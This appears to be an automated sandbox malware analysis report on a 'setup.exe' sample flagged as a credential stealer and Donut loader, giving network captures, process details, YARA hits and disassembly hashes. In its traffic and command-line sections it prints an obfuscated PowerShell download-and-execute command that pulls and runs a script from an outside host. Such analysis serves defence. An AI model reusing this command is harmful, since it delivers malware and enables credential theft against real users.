                                                                                                                            2025-01-07 14:26:31 UTC218INData Raw: 64 34 0d 0a 77 4a 36 6a 30 71 36 58 38 55 4b 6c 64 55 66 34 6f 39 31 75 47 43 49 44 5a 4a 62 75 41 55 4d 50 6b 78 4a 49 53 78 31 77 6d 31 43 62 35 59 47 6e 6a 4b 33 54 4b 74 45 42 4e 34 75 5a 67 55 46 45 44 57 41 42 38 5a 73 76 4d 47 66 38 59 68 52 6b 4a 55 57 73 5a 50 4b 6f 6b 65 61 61 6f 61 31 74 31 52 31 70 6a 4e 75 70 54 44 51 41 5a 52 43 30 31 44 4e 76 4c 66 59 77 63 6e 70 67 58 4f 42 79 74 62 79 5a 38 4d 62 6a 68 54 4c 57 54 78 76 58 2f 2f 49 46 64 45 74 7a 45 75 4f 44 61 44 42 36 2b 6a 77 37 49 33 49 41 78 33 2b 70 38 4e 65 4e 7a 66 75 42 48 64 59 64 4a 74 62 58 70 52 6f 36 44 69 45 43 34 73 77 37 63 79 4f 78 64 32 70 78 4c 51 33 47 0d 0a
                                                                                                                            Data Ascii: d4wJ6j0q6X8UKldUf4o91uGCIDZJbuAUMPkxJISx1wm1Cb5YGnjK3TKtEBN4uZgUFEDWAB8ZsvMGf8YhRkJUWsZPKokeaaoa1t1R1pjNupTDQAZRC01DNvLfYwcnpgXOBytbyZ8MbjhTLWTxvX//IFdEtzEuODaDB6+jw7I3IAx3+p8NeNzfuBHdYdJtbXpRo6DiEC4sw7cyOxd2pxLQ3G
                                                                                                                            2025-01-07 14:26:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            8192.168.2.749823185.161.251.214435916C:\Users\user\Desktop\setup.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2025-01-07 14:26:32 UTC201OUTGET /8574262446/ph.txt HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                            Host: cegu.shop
                                                                                                                            2025-01-07 14:26:32 UTC249INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.26.2
                                                                                                                            Date: Tue, 07 Jan 2025 14:26:32 GMT
                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                            Content-Length: 329
                                                                                                                            Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
                                                                                                                            Connection: close
                                                                                                                            ETag: "676c9e2a-149"
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2025-01-07 14:26:32 UTC329INData Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e
                                                                                                                            Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.


                                                                                                                            Statistics

                                                                                                                            CPU Usage

                                                                                                                            Click to jump to process

                                                                                                                            Memory Usage

                                                                                                                            Click to jump to process

                                                                                                                            High Level Behavior Distribution

                                                                                                                            Click to dive into process behavior distribution

                                                                                                                            Behavior

                                                                                                                            Click to jump to process

                                                                                                                            System Behavior

                                                                                                                            General

                                                                                                                            Target ID:0
                                                                                                                            Start time:09:26:05
                                                                                                                            Start date:07/01/2025
                                                                                                                            Path:C:\Users\user\Desktop\setup.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\Desktop\setup.exe"
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:74'584'760 bytes
                                                                                                                            MD5 hash:76F2E89ACE5C9B36679CE13B57C8B752
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1509456386.0000000003190000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1417442248.00000000008D1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1417555343.0000000000888000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:10
                                                                                                                            Start time:09:26:32
                                                                                                                            Start date:07/01/2025
                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; -
                                                                                                                            Imagebase:0xb30000
                                                                                                                            File size:433'152 bytes
                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:11
                                                                                                                            Start time:09:26:32
                                                                                                                            Start date:07/01/2025
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Disassembly

                                                                                                                            Reset < >

                                                                                                                              Executed Functions

                                                                                                                              Function 07670860 Relevance: 11.7, Strings: 9, Instructions: 457COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.1517455602.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_7670000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 4'q$4'q$tPq$tPq$$q$$q$$q$Ql$Ql
                                                                                                                              • API String ID: 0-1080431814
                                                                                                                              • Opcode ID: 60f43620e5e631f3b9c9f88ff1a187580a4dc7ee849cbe58ca21324aa1e1727d
                                                                                                                              • Instruction ID: c00cf0ed7fd8cc2ee1d11b92fae5e224d696910f1b6252676b4a4630abc17463
                                                                                                                              • Opcode Fuzzy Hash: 60f43620e5e631f3b9c9f88ff1a187580a4dc7ee849cbe58ca21324aa1e1727d
                                                                                                                              • Instruction Fuzzy Hash: 86E129B1B043168FDB258B78981176ABBE2AF81694F14806BD507DF391DB32DD42CBB1
                                                                                                                              Function 07671C38 Relevance: 2.7, Strings: 2, Instructions: 226COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.1517455602.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_7670000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 4'q$4'q
                                                                                                                              • API String ID: 0-1467158625
                                                                                                                              • Opcode ID: 93f31163f3c6fe8e561d7eab18fdeae3a9192bd66464c230db88b4063dc1a737
                                                                                                                              • Instruction ID: 7b923d180d3b9b05baec3bba1927474f2f89ec0a60415aa5e53993e16130501d
                                                                                                                              • Opcode Fuzzy Hash: 93f31163f3c6fe8e561d7eab18fdeae3a9192bd66464c230db88b4063dc1a737
                                                                                                                              • Instruction Fuzzy Hash: FC7167B170430A9FDB384A79882177ABBE69FC3280F14806BD547DB391DB35C942CB61
                                                                                                                              Function 03073FA0 Relevance: .7, Instructions: 687COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.1514794060.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_3070000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 63a4bbcb342d3c21fbb89945e6e974ec645f3e14fabc067c9cf397f0b0ef98de
                                                                                                                              • Instruction ID: 3638a33168b4896ecca8e86878c4e1e9a4b0a04bc5b5c968b06382d3112897af
                                                                                                                              • Opcode Fuzzy Hash: 63a4bbcb342d3c21fbb89945e6e974ec645f3e14fabc067c9cf397f0b0ef98de
                                                                                                                              • Instruction Fuzzy Hash: D0523874E012099FCB15CF99C484AAEFBB1FF49310F298199E815AB761C735EC91CB94
                                                                                                                              Function 03074198 Relevance: .1, Instructions: 107COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.1514794060.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_3070000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 28b923510acc72ee1006c16fec436edc7a53234d696dff82fcccb5730027c38b
                                                                                                                              • Instruction ID: 6d002b1971cca9b37b841e47f39caaa31cf1c5f665dbf22bf60f968be9a9358a
                                                                                                                              • Opcode Fuzzy Hash: 28b923510acc72ee1006c16fec436edc7a53234d696dff82fcccb5730027c38b
                                                                                                                              • Instruction Fuzzy Hash: 5A416C74E01605CFCB15CF99C098EAAFBB1FF48310B25819AD501AB760C336EC91CBA8
                                                                                                                              Function 03073010 Relevance: .1, Instructions: 65COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.1514794060.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_3070000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a2ff4466dcd9b0a077b0b88f514c83c2327a0b93b09c0012af8a20469c43b5a2
                                                                                                                              • Instruction ID: 3e70d8e9fc80fa9ed4aabe37a6157d0fdc18b852fc8a7b66709e234b15d71990
                                                                                                                              • Opcode Fuzzy Hash: a2ff4466dcd9b0a077b0b88f514c83c2327a0b93b09c0012af8a20469c43b5a2
                                                                                                                              • Instruction Fuzzy Hash: 07214974E05219DFDB00CF98C895AAEBBB4FF89300B14849AE855EB352C335EC41CBA1
                                                                                                                              Function 07671E28 Relevance: .1, Instructions: 52COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.1517455602.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_7670000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2ab4fe141a45818d05d69ac85e5eaaf6516754cb69be94c31b7360b652e7dec5
                                                                                                                              • Instruction ID: 00dc1136cb534fd69787ee42abe10b1f9031e8a1ce23c55b16c65e55348729b1
                                                                                                                              • Opcode Fuzzy Hash: 2ab4fe141a45818d05d69ac85e5eaaf6516754cb69be94c31b7360b652e7dec5
                                                                                                                              • Instruction Fuzzy Hash: 6A014CB630030967EB745D264D41F277AEB4FC1790F148027BD4A9B7C5C675D941C620
                                                                                                                              Function 02FBD01D Relevance: .0, Instructions: 45COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.1514433430.0000000002FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FBD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_2fbd000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 98769203fc5c2f3b621cf1e31404f383571efa56dfc2f856237b4cd91b2762ae
                                                                                                                              • Instruction ID: af8051985c76021a3101d07050c5e232d76dbbd1b9a967e81c5c2ec309b2a647
                                                                                                                              • Opcode Fuzzy Hash: 98769203fc5c2f3b621cf1e31404f383571efa56dfc2f856237b4cd91b2762ae
                                                                                                                              • Instruction Fuzzy Hash: D501A732905740AAE7214A26CD84BA6BB98DF41AE4F18C559EE480F28AC3799545CAB3
                                                                                                                              Function 02FBD005 Relevance: .0, Instructions: 45COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.1514433430.0000000002FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FBD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_2fbd000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a7f0156459c590e0fa97c7a71f60080a86fca8a7ad8b2058122c406bceb59956
                                                                                                                              • Instruction ID: cfbf6fec2946e30f4bee6144d60d7df33b0f2782a58fb673813b28774b822585
                                                                                                                              • Opcode Fuzzy Hash: a7f0156459c590e0fa97c7a71f60080a86fca8a7ad8b2058122c406bceb59956
                                                                                                                              • Instruction Fuzzy Hash: 3C01406140E7C09FD7128B258C94B92BFB4DF43664F1D81DBD9888F1A7C2695845C772

                                                                                                                              Non-executed Functions

                                                                                                                              Function 0307136A Relevance: .1, Instructions: 112COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.1514794060.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_3070000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 06a24cb561e6cbc8132057aa075f0cf0a152865e88e01264e69c099b489d4476
                                                                                                                              • Instruction ID: f62691d1ac47b693fb72fc2051bbbd63143f5345861271693ad3957d71fbfce5
                                                                                                                              • Opcode Fuzzy Hash: 06a24cb561e6cbc8132057aa075f0cf0a152865e88e01264e69c099b489d4476
                                                                                                                              • Instruction Fuzzy Hash: BD31781290E7C21FD31B87B808B55A57FB29D9704531E85EBC4C5EF4B3E40A686BD32A
                                                                                                                              Function 07670148 Relevance: 12.8, Strings: 10, Instructions: 324COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.1517455602.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_7670000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 4'q$4'q$tPq$tPq$#Kk$$q$$q$$q$Ql$Ql
                                                                                                                              • API String ID: 0-3436490625
                                                                                                                              • Opcode ID: 1a5a1cc37d7098ba90a4c0f134798e08e58729cfe04f697ce765b23d0e52cc77
                                                                                                                              • Instruction ID: 66492def2e1e576105b0d2eb067b4a5a632a87e0371a0d7fbb0caa73f3147f19
                                                                                                                              • Opcode Fuzzy Hash: 1a5a1cc37d7098ba90a4c0f134798e08e58729cfe04f697ce765b23d0e52cc77
                                                                                                                              • Instruction Fuzzy Hash: 6DA178B27043128FD7214B79981177ABBE6AFC62A1B18807BD447DB391DA31C846C7B1
                                                                                                                              Function 07670508 Relevance: 6.5, Strings: 5, Instructions: 275COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.1517455602.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_7670000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 4'q$4'q$tPq$tPq$$Kk
                                                                                                                              • API String ID: 0-2668562183
                                                                                                                              • Opcode ID: 126efb8d3d9c38f825b458912ca5b32438c56dfedecd8b2dfb0b3a4c39fa3c8b
                                                                                                                              • Instruction ID: df3d1c46b16600c4d56ffd8255fe95f40bbf6e9f0faf5ac7d52c6edba973d28e
                                                                                                                              • Opcode Fuzzy Hash: 126efb8d3d9c38f825b458912ca5b32438c56dfedecd8b2dfb0b3a4c39fa3c8b
                                                                                                                              • Instruction Fuzzy Hash: 2B8117F2B043169FEB244A78882177A7BE6AFC1251F14846BE507DF791DA31C842C7B1
                                                                                                                              Function 07671F20 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.1517455602.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_7670000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $q$$q$$q$Ql$Ql
                                                                                                                              • API String ID: 0-2864297488
                                                                                                                              • Opcode ID: 0cbb8c879853701ba0b128877dc24f562d19beadbbedab2921d484c9df8a0d92
                                                                                                                              • Instruction ID: b395797855e53cfdb2557342e97f9d82aac0979ae6c3def6606716c175e0caa2
                                                                                                                              • Opcode Fuzzy Hash: 0cbb8c879853701ba0b128877dc24f562d19beadbbedab2921d484c9df8a0d92
                                                                                                                              • Instruction Fuzzy Hash: E411EC7131430E9BEB38557A8805776B7E6EBC36A1F2C802BE54787380CB79C442C351
                                                                                                                              Function 07672428 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.1517455602.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_7670000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $q$$q$$q$$q
                                                                                                                              • API String ID: 0-4102054182
                                                                                                                              • Opcode ID: d2d64e101bb4a6925035084e85177b26076652cdd654f895e762a39b04de3bc7
                                                                                                                              • Instruction ID: 1dfabbf87b5c6d1c4a8cc1a78c8ef76c8eff78fa98c4e219093165ae455a66c5
                                                                                                                              • Opcode Fuzzy Hash: d2d64e101bb4a6925035084e85177b26076652cdd654f895e762a39b04de3bc7
                                                                                                                              • Instruction Fuzzy Hash: 60214CB27103025FEB345A3ADC6272777FAABC0655F248026A807DB385DD35D845C321